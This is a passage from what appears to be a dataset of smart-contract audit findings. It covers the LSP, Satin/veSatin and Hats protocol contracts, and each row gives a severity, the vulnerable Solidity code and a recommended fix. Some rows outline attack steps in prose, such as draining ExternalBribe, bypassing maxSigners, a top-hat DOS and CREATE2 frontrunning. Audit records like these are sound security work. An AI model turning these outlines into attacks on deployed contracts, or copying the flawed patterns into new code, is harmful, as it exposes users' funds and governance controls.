However, in `supportsInterface()` it does not return the LSP20 interfaceId.\\n```\\n function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\\n return\\n interfaceId == _INTERFACEID_LSP6 || interfaceId == _INTERFACEID_ERC1271 ||\\n super.supportsInterface(interfaceId);\\n }\\n```\\n\\nAs a result, clients which correctly check for support of LSP20 methods will not operate with the KeyManager implementation.",Insert another supported interfaceId under `supportsInterface()`.,,```\\n function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {\\n return\\n interfaceId == _INTERFACEID_LSP6 || interfaceId == _INTERFACEID_ERC1271 ||\\n super.supportsInterface(interfaceId);\\n }\\n```\\n +LSP0 ownership functions deviate from specification and reject native tokens,low,"The LSP specifications define the following functions for LSP0:\\n```\\n function transferOwnership(address newPendingOwner) external payable;\\n function renounceOwnership() external payable;\\n```\\n\\nHowever, their implementations are not payable.\\n```\\n function transferOwnership(address newOwner) public virtual\\n override(LSP14Ownable2Step, OwnableUnset)\\n {\\n```\\n\\n```\\n function renounceOwnership() public virtual override(LSP14Ownable2Step, OwnableUnset) {\\n address _owner = owner();\\n```\\n\\nThis may break interoperation between conforming and non-conforming contracts.","Remove the payable keyword in the specification for the above functions, or make the implementations payable",,```\\n function transferOwnership(address newPendingOwner) external payable;\\n function renounceOwnership() external payable;\\n```\\n +Transfers of vaults from an invalid source are not treated correctly by receiver delegate,low,"In the universalReceiver() function, if the notifying contract does not support LSP9, yet the typeID corresponds to an LSP9 transfer, the function will return instead of reverting.\\n```\\n if (\\n mapPrefix == 
_LSP10_VAULTS_MAP_KEY_PREFIX && notifier.code.length > 0 &&\\n !notifier.supportsERC165InterfaceUnchecked(_INTERFACEID_LSP9)\\n ) {\\n return ""LSP1: not an LSP9Vault ownership transfer"";\\n }\\n```\\n",Revert when dealing with transfers that cannot be valid.,,"```\\n if (\\n mapPrefix == _LSP10_VAULTS_MAP_KEY_PREFIX && notifier.code.length > 0 &&\\n !notifier.supportsERC165InterfaceUnchecked(_INTERFACEID_LSP9)\\n ) {\\n return ""LSP1: not an LSP9Vault ownership transfer"";\\n }\\n```\\n" +Relayer can choose amount of gas for delivery of message,low,"LSP6 supports relaying of calls using a supplied signature. The encoded message is defined as:\\n```\\n bytes memory encodedMessage = abi.encodePacked( LSP6_VERSION,\\n block.chainid,\\n nonce,\\n msgValue,\\n payload\\n );\\n```\\n\\nThe message doesn't include a gas parameter, which means the relayer can specify any gas amount. If the provided gas is insufficient, the entire transaction will revert. However, if the called contract exhibits different behavior depending on the supplied gas, a relayer (attacker) has control over that behavior.",Signed message should include the gas amount passed. Care should be taken to verify there is enough gas in the current state for the gas amount not to be truncated due to the 63/64 rule.,,"```\\n bytes memory encodedMessage = abi.encodePacked( LSP6_VERSION,\\n block.chainid,\\n nonce,\\n msgValue,\\n payload\\n );\\n```\\n" +_calculateClaim() does not distribute boost emissions correctly,high,"The function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. The idea is to distribute emissions only to veSatin tokens locked for more than minLockDurationForReward and only for the extra time the veSatin is locked for on top of minLockDurationForReward. 
As an example, if minLockDurationForReward is set to 6 months a veSatin locked for 7 months would receive emissions for 1 month and a veSatin locked for 5 months would receive no emissions at all. To do so the following code is executed in a loop, where every loop calculates the amount of emissions the veSatin accumulated during a specific week, in chronological order:\\n```\\n if ((lockEndTime - oldUserPoint.ts) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nThe code distributes the rewards if the elapsed time between lockEndTime (the locking end timestamp) and oldUserPoint.ts is bigger than minLockDurationForReward. However, oldUserPoint.ts is the timestamp of the last user action on a veSatin, for example depositing LP by calling `increaseAmount()`. As an example, a user that locks his veSatin and does nothing else will receive rewards for the whole locking duration. In contrast, a user that performs one action a week would only receive rewards for the locking duration minus minLockDurationForReward",The variable weekCursor should be used instead of oldUserPoint.ts in the if condition:\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n```\\n,,```\\n if ((lockEndTime - oldUserPoint.ts) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n +Users will be unable to claim emissions from veSatin tokens if they withdraw it or merge it,high,"The function `_calculateClaim()` uses the variable lockEndTime when checking if a veSatin is entitled to emissions for a particular week (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nHowever lockEndTime is set to 0 
whenever a user withdraws a veSatin by calling `withdraw()` or merges one by calling `merge()`. When this is the case the operation lockEndTime - weekCursor underflows, thus reverting. This results in users being unable to claim veSatin emissions if they withdraw or merge it first","In the `withdraw()` and `merge()` functions, call `claim()` in VeDist.sol to claim emissions before setting the lock end timestamp to 0. In `merge()` this is only necessary for the veSatin passed as _from",,```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n +It's never possible to vote for new pools until setMaxVotesForPool() is called,high,"The function `_vote()` allows voting on a pool only when the current amount of votes plus the new votes is lower or equal to the value returned by _calculateMaxVotePossible():\\n```\\n require(_poolWeights <= _calculateMaxVotePossible(_pool), ""Max votes exceeded"");\\n```\\n\\nHowever, `_calculateMaxVotePossible()` returns 0 for every pool in which the variable maxVotesForPool has not been initialized, thus making `_vote()` revert:\\n```\\n return ((totalVotingPower * maxVotesForPool[_pool]) / 100);\\n```\\n",In `createGauge()` and `createGauge4Pool()` set maxVotesForPool for the pool the gauge is being created for to 100.,,"```\\n require(_poolWeights <= _calculateMaxVotePossible(_pool), ""Max votes exceeded"");\\n```\\n" +The protocol might transfer extra SATIN emissions to veSatin holders potentially making SatinVoter.sol insolvent,high,"The function `_distribute()` in SatinVoter.sol is generally responsible for distributing weekly emissions to a gauge based on the percentage of total votes the associated pool received. In particular, it's called by `updatePeriod()` (as per fix TRST-H-4) on the gauge associated with the Satin / $CASH pool. 
The variable veShare is set to be equal to the returned value of `calculateSatinCashLPVeShare()`, which is calculated as the percentage of Satin / $CASH LP times claimable[gauge] and represents the amount of SATIN that will be transferred to VeDist.sol when checkpointing emissions in checkpointEmissions():\\n```\\n uint _claimable = claimable[_gauge];\\n if (SATIN_CASH_LP_GAUGE == _gauge) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n _claimable -= veShare;\\n }\\n if (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) {\\n claimable[_gauge] = 0;\\n if (is4poolGauge[_gauge]) {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, true);\\n } else {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, false);\\n }\\n emit DistributeReward(msg.sender, _gauge, _claimable);\\n }\\n```\\n\\nHowever, when the if condition (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) is false the variable claimable[_gauge] will not be set to 0, meaning the next time veShare will be calculated it will include emissions that have already been distributed, potentially making SatinVoter.sol insolvent",Adjust claimable[gauge] after calculating veShare and calculate veShare only if the msg.sender is SatinMinter.sol to prevent potential attackers from manipulating the value by repeatedly calling _distribute():\\n```\\n if (SATIN_CASH_LP_GAUGE == _gauge && msg.sender == minter) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n claimable[_gauge] -= veShare;\\n _claimable -= veShare;\\n }\\n```\\n,,"```\\n uint _claimable = claimable[_gauge];\\n if (SATIN_CASH_LP_GAUGE == _gauge) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n _claimable -= veShare;\\n }\\n if (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) {\\n claimable[_gauge] = 0;\\n if (is4poolGauge[_gauge]) {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, true);\\n } else {\\n 
IGauge(_gauge).notifyRewardAmount(token, _claimable, false);\\n }\\n emit DistributeReward(msg.sender, _gauge, _claimable);\\n }\\n```\\n" +It's possible to drain all the funds from ExternalBribe,high,"The function `earned()` is used to calculate the amount of rewards owed to a tokenId, to do so it performs a series of operations over a loop and then it always executes:\\n```\\n Checkpoint memory cp = checkpoints[tokenId][_endIndex];\\n uint _lastEpochStart = _bribeStart(cp.timestamp);\\n uint _lastEpochEnd = _lastEpochStart + DURATION;\\n if (block.timestamp > _lastEpochEnd) {\\n reward += (cp.balanceOf * \\n tokenRewardsPerEpoch[token][_lastEpochStart]) /\\n supplyCheckpoints[getPriorSupplyIndex(_lastEpochEnd)].supply;\\n```\\n\\nwhich adds to reward the amount of rewards earned by the tokenId during the last epoch in which it was used to vote, but only if that happened at least a week prior (block.timestamp > _lastEpochEnd). Because of this, it's possible to call `earned()` multiple times in a row with a tokenId that voted more than a week before to drain the contract funds.","The function `earned()` is taken from the Velodrome protocol and is known to have issues. Because it uses the convoluted logic of looping over votes to calculate the rewards per epoch instead of looping over epochs, we recommend using the Velodrome fixed implementation, which we reviewed:\\n```\\n function earned(address token, uint tokenId) public view returns (uint) {\\n if (numCheckpoints[tokenId] == 0) {\\n return 0;\\n }\\n uint reward = 0;\\n uint _ts = 0;\\n uint _bal = 0;\\n uint _supply = 1;\\n uint _index = 0;\\n uint _currTs = _bribeStart(lastEarn[token][tokenId]); // take epoch last claimed in as starting point\\n _index = getPriorBalanceIndex(tokenId, _currTs);\\n _ts = checkpoints[tokenId][_index].timestamp;\\n _bal = checkpoints[tokenId][_index].balanceOf;\\n // accounts for case where lastEarn is before first checkpoint\\n _currTs = Math.max(_currTs, _bribeStart(_ts));\\n // get epochs between current epoch and first checkpoint in same epoch as last claim\\n uint numEpochs = (_bribeStart(block.timestamp) - _currTs) / DURATION;\\n if (numEpochs > 0) {\\n for (uint256 i = 0; i < numEpochs; i++) {\\n // get index of last checkpoint in this epoch\\n _index = getPriorBalanceIndex(tokenId, _currTs + DURATION);\\n // get checkpoint in this epoch\\n _ts = checkpoints[tokenId][_index].timestamp;\\n _bal = checkpoints[tokenId][_index].balanceOf;\\n // get supply of last checkpoint in this epoch\\n _supply = supplyCheckpoints[getPriorSupplyIndex(_currTs + DURATION)].supply;\\n reward += _bal * tokenRewardsPerEpoch[token][_currTs] / _supply;\\n _currTs += DURATION;\\n }\\n }\\n return reward;\\n }\\n```\\n",,```\\n Checkpoint memory cp = checkpoints[tokenId][_endIndex];\\n uint _lastEpochStart = _bribeStart(cp.timestamp);\\n uint _lastEpochEnd = _lastEpochStart + DURATION;\\n if (block.timestamp > _lastEpochEnd) {\\n reward += (cp.balanceOf * \\n tokenRewardsPerEpoch[token][_lastEpochStart]) /\\n supplyCheckpoints[getPriorSupplyIndex(_lastEpochEnd)].supply;\\n```\\n +Division by 0 can freeze emissions claims for veSatin holders,medium,"The function `
`_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. In doing so, this code is executed (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nThe variable veSupply[weekCursor] is used as a denominator without checking if it's 0, which could make the function revert. If the protocol ever reaches a state where veSupply[weekCursor] is 0, all the claims for veSatin that were locked during that week would fail for both past and future claims. The same issue is present in the function `_calculateEmissionsClaim()`",Ensure veSupply[weekCursor] is not 0 when performing the division.,,```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n +BaseV1Pair could break because of overflow,medium,"In the function _update(), called internally by `mint()`, `burn()` and `swap()`, the following code is executed:\\n```\\n uint256 timeElapsed = blockTimestamp - blockTimestampLast;\\n // overflow is desired\\n if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n reserve0CumulativeLast += _reserve0 * timeElapsed;\\n reserve1CumulativeLast += _reserve1 * timeElapsed;\\n }\\n```\\n\\nThis is forked from UniswapV2 source code, and it's meant and known to overflow. It works fine if solidity < 0.8.0 is used but reverts when solidity >= 0.8.0 is used. 
If this happens all the core functionalities of the pool would break, including `mint()`, `burn()`, and `swap()`.",Wrap the operation around an unchecked{} block so that when the variable overflows it loops back to 0 instead of reverting.,,```\\n uint256 timeElapsed = blockTimestamp - blockTimestampLast;\\n // overflow is desired\\n if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n reserve0CumulativeLast += _reserve0 * timeElapsed;\\n reserve1CumulativeLast += _reserve1 * timeElapsed;\\n }\\n```\\n +createGauge4Pool() lacks proper checks and/or access control,medium,"The function createGauge4Pool() can be called by anybody at any time and is used to create a Gauge for a special pool, the 4pool. It takes 5 parameters as inputs:\\n```\\n function createGauge4pool(\\n address _4pool,\\n address _dai,\\n address _usdc,\\n address _usdt,\\n address _cash\\n ) external returns (address) {\\n```\\n\\nNone of the parameters are properly sanitized, meaning _dai, _usdc, _usdt, _cash could be any whitelisted token and not necessarily DAI, USDC, USDT, and cash while _4pool could be any custom contract, including a malicious one. The function also sets the variable FOUR_POOL_GAUGE_ADDRESS to the newly created gauge, overwriting the previous value.","Make the function only callable by an admin, and if it can be called multiple times, turn the variable FOUR_POOL_GAUGE_ADDRESS to a mapping from address to boolean to support multiple 4 pools.",,"```\\n function createGauge4pool(\\n address _4pool,\\n address _dai,\\n address _usdc,\\n address _usdt,\\n address _cash\\n ) external returns (address) {\\n```\\n" +The logic in _calculateClaim() can leave some tokens locked and waste gas,low,"The function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. 
To do so, this code is executed in a loop for each week from the current timestamp to the last claim (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nWhen the if condition is not met two things happen:\\nAn amount of emissions that was supposed to be distributed ((balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor])) is skipped, meaning it will stay locked in the contract.\\nThe function `_calculateClaim()` will loop for the maximum number of times (50), because weekCursor is not increased, wasting users' gas.",When the if condition is not met burn the tokens that were supposed to be distributed and exit the loop. Since the non-distributed tokens would stay locked it's not strictly necessary to burn them.,,```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n +More than one hat of the same hatId can be assigned to a user,high,"Hats are minted internally using `_mintHat()`.\\n```\\n /// @notice Internal call to mint a Hat token to a wearer\\n /// @dev Unsafe if called when `_wearer` has a non-zero balance of `_hatId`\\n /// @param _wearer The wearer of the Hat and the recipient of the newly minted token\\n /// @param _hatId The id of the Hat to mint\\n function _mintHat(address _wearer, uint256 _hatId) internal {\\n unchecked {\\n // should not overflow since `mintHat` enforces max balance of 1\\n _balanceOf[_wearer][_hatId] = 1;\\n // increment Hat supply counter\\n // should not overflow given AllHatsWorn check in `mintHat` ++_hats[_hatId].supply;\\n }\\n emit TransferSingle(msg.sender, address(0), _wearer, _hatId, 1);\\n }\\n```\\n\\nAs documentation states, it is unsafe if _wearer already has the hatId. 
However, this could easily be the case when called from `mintHat()`.\\n```\\n function mintHat(uint256 _hatId, address _wearer) public returns (bool) {\\n Hat memory hat = _hats[_hatId];\\n if (hat.maxSupply == 0) revert HatDoesNotExist(_hatId);\\n // only the wearer of a hat's admin Hat can mint it\\n _checkAdmin(_hatId);\\n if (hat.supply >= hat.maxSupply) {\\n revert AllHatsWorn(_hatId);\\n }\\n if (isWearerOfHat(_wearer, _hatId)) {\\n revert AlreadyWearingHat(_wearer, _hatId);\\n }\\n _mintHat(_wearer, _hatId);\\n return true;\\n }\\n```\\n\\nThe function validates _wearer doesn't currently wear the hat, but its balance could still be over 0, if the hat is currently toggled off or the wearer is not eligible. The impact is that the hat supply is forever spent, while nobody actually received the hat. This could be used maliciously or occur by accident. When the hat is immutable, the max supply can never be corrected for this leak. It could be used to guarantee no additional, unfriendly hats can be minted to maintain permanent power.","Instead of checking if user currently wears the hat, check if its balance is over 0.",,"```\\n /// @notice Internal call to mint a Hat token to a wearer\\n /// @dev Unsafe if called when `_wearer` has a non-zero balance of `_hatId`\\n /// @param _wearer The wearer of the Hat and the recipient of the newly minted token\\n /// @param _hatId The id of the Hat to mint\\n function _mintHat(address _wearer, uint256 _hatId) internal {\\n unchecked {\\n // should not overflow since `mintHat` enforces max balance of 1\\n _balanceOf[_wearer][_hatId] = 1;\\n // increment Hat supply counter\\n // should not overflow given AllHatsWorn check in `mintHat` ++_hats[_hatId].supply;\\n }\\n emit TransferSingle(msg.sender, address(0), _wearer, _hatId, 1);\\n }\\n```\\n" +TXs can be executed by less than the minimum required signatures,high,"In HatsSignerGateBase, `checkTransaction()` is the function called by the Gnosis safe to approve the transaction. 
Several checks are in place.\\n```\\n uint256 safeOwnerCount = safe.getOwners().length;\\n if (safeOwnerCount < minThreshold) {\\n revert BelowMinThreshold(minThreshold, safeOwnerCount);\\n }\\n```\\n\\n```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n\\nThe first check is that the number of owners registered on the safe is at least minThreshold. The second check is that the number of valid signatures (wearers of relevant hats) is not below the safe's threshold. However, it turns out these requirements are not sufficient. A possible situation is that there are plenty of owners registered, but currently most do not wear a hat. `reconcileSignerCount()` could be called to reduce the safe's threshold to the current validSigCount, which can be below minThreshold. That would make both the first and second check succeed. However, minThreshold is defined to be the smallest number of signers that must come together to make a TX. The result is that a single signer could execute a TX on the safe, if the other signers are not wearers of hats (for example, their toggle has been temporarily set off in the case of multi-hat signer gate.","Add another check in `checkTransaction()`, which states that validSigCount >= minThreshold.",,"```\\n uint256 safeOwnerCount = safe.getOwners().length;\\n if (safeOwnerCount < minThreshold) {\\n revert BelowMinThreshold(minThreshold, safeOwnerCount);\\n }\\n```\\n" +Target signature threshold can be bypassed leading to minority TXs,high,"`checkTransaction()` is the enforcer of the HSG logic, making sure signers are wearers of hats and so on. 
The check below makes sure sufficient hat wearers signed the TX:\\n```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n\\nThe issue is that the safe's threshold is not guaranteed to be up to date. For example, initially there were 5 delegated signers. At some point, three lost eligibility. `reconcileSignerCount()` is called to update the safe's threshold to now have 2 signers. At a later point, the three signers which lost eligibility regained it. At this point, the threshold is still two, but there are 5 valid signers, so if targetThreshold is not below 5, they should all sign for a TX to be executed. That is not the case, as the old threshold is used. There are various scenarios which surface the lack of synchronization between the wearer status and safe's stored threshold.",Call `reconcileSignerCount()` before the validation code in `checkTransaction()`.,,"```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n" +maxSigners can be bypassed,high,"maxSigners is specified when creating an HSG and is left constant. It is enforced in two ways -targetThreshold may never be set above it, and new signers cannot register to the HSG when the signer count reached maxSigners. 
Below is the implementation code in HatsSignerGate.\\n```\\n function claimSigner() public virtual {\\n if (signerCount == maxSigners) {\\n revert MaxSignersReached();\\n }\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n _grantSigner(msg.sender);\\n }\\n```\\n\\nAn issue that arises is that this doesn't actually limit the number of registered signers. Indeed, signerCount is a variable that can fluctuate when wearers lose eligibility or a hat is inactive. At this point, `reconcileSignerCount()` can be called to update the signerCount to the current valid wearer count. A simple attack which achieves unlimited claims is as follows:\\nAssume maxSigners = 10\\n10 signers claim their spot, so signerCount is maxed out\\nA signer misbehaves, loses eligibility and the hat.\\nreconcile() is called, so signerCount is updated to 9\\nA new signer claims, making signerCount = 10\\nThe malicious signer behaves nicely and regains the hat.\\nreconcile() is called again, making signerCount = 11\\nAt this point, any eligible hat wearer can claim their hat, easily overrunning the maxSigners restriction.","The root cause is that users which registered but lose their hat are still stored in the safe's owners array, meaning they can always get re-introduced and bump the signerCount. Instead of checking the signerCount, a better idea would be to compare with the list of owners saved on the safe. 
If there are owners that are no longer holders, `removeSigner()` can be called to vacate space for new signers.",,```\\n function claimSigner() public virtual {\\n if (signerCount == maxSigners) {\\n revert MaxSignersReached();\\n }\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n _grantSigner(msg.sender);\\n }\\n```\\n +Attacker can DOS minting of new top hats in low-fee chains,medium,"In Hats protocol, anyone can be assigned a top hat via the `mintTopHat()` function. The top hats are structured with top 32 bits acting as a domain ID, and the lower 224 bits are cleared. There are therefore up to 2^32 = ~ 4 billion top hats. Once they are all consumed, `mintTopHat()` will always fail:\\n```\\n // uint32 lastTopHatId will overflow in brackets\\n topHatId = uint256(++lastTopHatId) << 224;\\n```\\n\\nThis behavior exposes the project to a DOS vector, where an attacker can mint 4 billion top hats in a loop and make the function unusable, forcing a redeploy of Hats protocol. This is unrealistic on ETH mainnet due to gas consumption, but definitely achievable on the cheaper L2 networks. As the project will be deployed on a large variety of EVM blockchains, this poses a significant risk.",Require a non-refundable deposit fee (paid in native token) when minting a top hat. Price it so that consuming the 32-bit space will be impossible. This can also serve as a revenue stream for the Hats project.,,```\\n // uint32 lastTopHatId will overflow in brackets\\n topHatId = uint256(++lastTopHatId) << 224;\\n```\\n +Linking of hat trees can freeze hat operations,medium,"Hats support tree-linking, where hats from one node link to the first level of a different domain. This way, the amount of levels for the linked-to tree increases by the linked-from level count. 
This is generally fine, however lack of checking of the new total level introduces severe risks.\\n```\\n /// @notice Identifies the level a given hat in its hat tree\\n /// @param _hatId the id of the hat in question\\n /// @return level (0 to type(uint8).max)\\n function getHatLevel(uint256 _hatId) public view returns (uint8) {\\n```\\n\\nThe `getHatLevel()` function can only return up to level 255. It is used by the `checkAdmin()` call used in many of the critical functions in the Hats contract. Therefore, if for example, 17 hat domains are joined together in the most stretched way possible, It would result in a correct hat level of 271, making this calculation revert:\\n```\\n if (treeAdmin != 0) {\\n return 1 + uint8(i) + getHatLevel(treeAdmin);\\n }\\n```\\n\\nThe impact is that intentional or accidental linking that creates too many levels would freeze the higher hat levels from any interaction with the contract.","It is recommended to add a check in `_linkTopHatToTree()`, that the new accumulated level can fit in uint8. 
Another option would be to change the maximum level type to uint32.",,```\\n /// @notice Identifies the level a given hat in its hat tree\\n /// @param _hatId the id of the hat in question\\n /// @return level (0 to type(uint8).max)\\n function getHatLevel(uint256 _hatId) public view returns (uint8) {\\n```\\n +Attacker can make a signer gate creation fail,medium,"DAOs can deploy a HSG using `deployHatsSignerGateAndSafe()` or deployMultiHatsSignerGateAndSafe().The parameters are encoded and passed to moduleProxyFactory.deployModule():\\n```\\n bytes memory initializeParams = abi.encode(_ownerHatId, _signersHatId, _safe, hatsAddress, _minThreshold, \\n _targetThreshold, _maxSigners, version );\\n hsg = moduleProxyFactory.deployModule(hatsSignerGateSingleton, abi.encodeWithSignature(""setUp(bytes)"", \\n initializeParams), _saltNonce );\\n```\\n\\nThis function will call createProxy():\\n```\\n proxy = createProxy( masterCopy, keccak256(abi.encodePacked(keccak256(initializer), saltNonce)) );\\n```\\n\\nThe second parameter is the generated salt, which is created from the initializer and passed saltNonce. Finally `createProxy()` will use CREATE2 to create the contract:\\n```\\n function createProxy(address target, bytes32 salt) internal returns (address result)\\n {\\n if (address(target) == address(0)) revert ZeroAddress(target);\\n if (address(target).code.length == 0) revert \\n TargetHasNoCode(target);\\n bytes memory deployment = abi.encodePacked(\\n hex""602d8060093d393df3363d3d373d3d3d363d73"", target, hex""5af43d82803e903d91602b57fd5bf3"" );\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n result := create2(0, add(deployment, 0x20), \\n mload(deployment), salt)\\n }\\n if (result == address(0)) revert TakenAddress(result);\\n }\\n```\\n\\nAn issue could be that an attacker can frontrun the creation TX with their own creation request, with the same parameters. 
This would create the exact address created by the CREATE2 call, since the parameters and therefore the final salt will be the same. When the victim's transaction would be executed, the address is non-empty so the EVM would reject its creation. This would result in a bad UX for a user, who thinks the creation did not succeed. The result contract would still be usable, but would be hard to track as it was created in another TX.",Use an ever-increasing nonce counter to guarantee unique contract addresses.,,"```\\n bytes memory initializeParams = abi.encode(_ownerHatId, _signersHatId, _safe, hatsAddress, _minThreshold, \\n _targetThreshold, _maxSigners, version );\\n hsg = moduleProxyFactory.deployModule(hatsSignerGateSingleton, abi.encodeWithSignature(""setUp(bytes)"", \\n initializeParams), _saltNonce );\\n```\\n" +Signers can backdoor the safe to execute any transaction in the future without consensus,medium,"The function `checkAfterExecution()` is called by the safe after signer's request TX was executed (and authorized). It mainly checks that the linkage between the safe and the HSG has not been compromised.\\n```\\n function checkAfterExecution(bytes32, bool) external override {\\n if (abi.decode(StorageAccessible(address(safe)).getStorageAt(uint256(GUARD_STORAGE_SLOT), 1), (address))\\n != address(this)) \\n {\\n revert CannotDisableThisGuard(address(this));\\n }\\n if (!IAvatar(address(safe)).isModuleEnabled(address(this))) {\\n revert CannotDisableProtectedModules(address(this));\\n }\\n if (safe.getThreshold() != _correctThreshold()) {\\n revert SignersCannotChangeThreshold();\\n }\\n // leave checked to catch underflows triggered by re-erntry\\n attempts\\n --guardEntries;\\n }\\n```\\n\\nHowever, it is missing a check that no new modules have been introduced to the safe. When modules execute TXs on a Gnosis safe, the guard safety callbacks do not get called. As a result, any new module introduced is free to execute whatever it wishes on the safe. 
It constitutes a serious backdoor threat and undermines the HSG security model.","Check that no new modules have been introduced to the safe, using the `getModulesPaginated()` utility.",,"```\\n function checkAfterExecution(bytes32, bool) external override {\\n if (abi.decode(StorageAccessible(address(safe)).getStorageAt(uint256(GUARD_STORAGE_SLOT), 1), (address))\\n != address(this)) \\n {\\n revert CannotDisableThisGuard(address(this));\\n }\\n if (!IAvatar(address(safe)).isModuleEnabled(address(this))) {\\n revert CannotDisableProtectedModules(address(this));\\n }\\n if (safe.getThreshold() != _correctThreshold()) {\\n revert SignersCannotChangeThreshold();\\n }\\n // leave checked to catch underflows triggered by re-erntry\\n attempts\\n --guardEntries;\\n }\\n```\\n" +createHat does not detect MAX_LEVEL admin correctly,low,"In `createHat()`, the contract checks user is not minting hats for the lowest hat tier:\\n```\\n function createHat( uint256 _admin, string memory _details, uint32 _maxSupply, address _eligibility,\\n address _toggle, bool _mutable, string memory _imageURI) \\n public returns (uint256 newHatId) {\\n if (uint8(_admin) > 0) {\\n revert MaxLevelsReached();\\n }\\n ….\\n }\\n```\\n\\nThe issue is that it does not check for max level correctly, as it looks only at the lowest 8 bits. Each level is composed of 16 bits, so ID xx00 would pass this check. Fortunately, although the check is passed, the function will revert later. The call to `getNextId(_admin)` will return 0 for max-level admin, and _checkAdmin(0) is guaranteed to fail. 
However, the check should still be fixed as it is not exploitable only by chance.",Change the conversion to uint16.,,"```\\n function createHat( uint256 _admin, string memory _details, uint32 _maxSupply, address _eligibility,\\n address _toggle, bool _mutable, string memory _imageURI) \\n public returns (uint256 newHatId) {\\n if (uint8(_admin) > 0) {\\n revert MaxLevelsReached();\\n }\\n ….\\n }\\n```\\n" +Incorrect imageURI is returned for hats in certain cases,low,"Function `getImageURIForHat()` should return the most relevant imageURI for the requested hatId. It will iterate backwards from the current level down to level 0, and return an image if it exists for that level.\\n```\\n function getImageURIForHat(uint256 _hatId) public view returns (string memory) {\\n // check _hatId first to potentially avoid the `getHatLevel` call\\n Hat memory hat = _hats[_hatId];\\n string memory imageURI = hat.imageURI; // save 1 SLOAD\\n // if _hatId has an imageURI, we return it\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // otherwise, we check its branch of admins\\n uint256 level = getHatLevel(_hatId);\\n // but first we check if _hatId is a tophat, in which case we fall back to the global image uri\\n if (level == 0) return baseImageURI;\\n // otherwise, we check each of its admins for a valid imageURI\\n uint256 id;\\n // already checked at `level` above, so we start the loop at `level - 1`\\n for (uint256 i = level - 1; i > 0;) {\\n id = getAdminAtLevel(_hatId, uint8(i));\\n hat = _hats[id];\\n imageURI = hat.imageURI;\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // should not underflow given stopping condition is > 0\\n unchecked {\\n --i;\\n }\\n }\\n // if none of _hatId's admins has an imageURI of its own, we \\n again fall back to the global image uri\\n return baseImageURI;\\n }\\n```\\n\\nIt can be observed that the loop body will not run for level 0. 
